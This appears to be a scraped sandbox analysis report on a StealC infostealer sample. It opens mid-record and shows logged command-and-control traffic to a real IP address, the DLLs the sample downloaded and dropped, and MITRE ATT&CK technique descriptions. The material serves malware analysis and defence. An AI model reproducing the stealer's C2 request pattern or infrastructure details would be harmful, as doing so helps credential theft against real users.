name="message"ybncbhylepme------BKECAEBGHDAEBFHIEGHI--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 95.182.96.50Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 33 61 66 39 61 38 62 32 66 31 33 37 39 36 62 31 35 65 32 61 33 33 34 36 64 31 64 61 30 30 36 64 66 30 66 33 34 66 64 62 32 61 35 38 38 65 66 33 61 35 62 34 38 37 35 63 35 39 38 33 38 33 66 65 37 66 66 62 35 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"233af9a8b2f13796b15e2a3346d1da006df0f34fdb2a588ef3a5b4875c598383fe7ffb5c------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HIIIJDAAAAAAKECBFBAE--

Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50
Source: unknown	TCP traffic detected without corresponding DNS query: 95.182.96.50

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 95.182.96.50Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/freebl3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/mozglue.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/msvcp140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/nss3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/softokn3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/vcruntime140.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fXg8zgxVTF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFCBFIJEHDHCBGDGDGCB

C:\ProgramData\CFCGIIEHIEGDGDGCAEBGDAKFCB

C:\ProgramData\CFHDBFIEGIDGIECBKJECBKFHCA

C:\ProgramData\FHCAFIDB

C:\ProgramData\GHIJJJEG

C:\ProgramData\GHIJJJEGDBFHDHJJDBAKKJJECA

C:\ProgramData\HDGCGHIJKEGIECBFCBAE

C:\ProgramData\IJDBGDGCGDAKFIDGIDBFIEHDHJ

C:\ProgramData\JKFCBAEHCAEGDHJKFHJK

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

C:\ProgramData\vcruntime140.dll

Windows Analysis Report
fXg8zgxVTF.exe

Function 00418E5F Relevance: 1.6, APIs: 1, Instructions: 125
memoryCOMMON

Function 00418E1A Relevance: 1.6, APIs: 1, Instructions: 111
memoryCOMMONLIBRARYCODE

Function 00418B59 Relevance: 1.6, APIs: 1, Instructions: 110
memoryCOMMON

Function 004190F1 Relevance: 1.3, Strings: 1, Instructions: 99
COMMON

Function 0042E02D Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre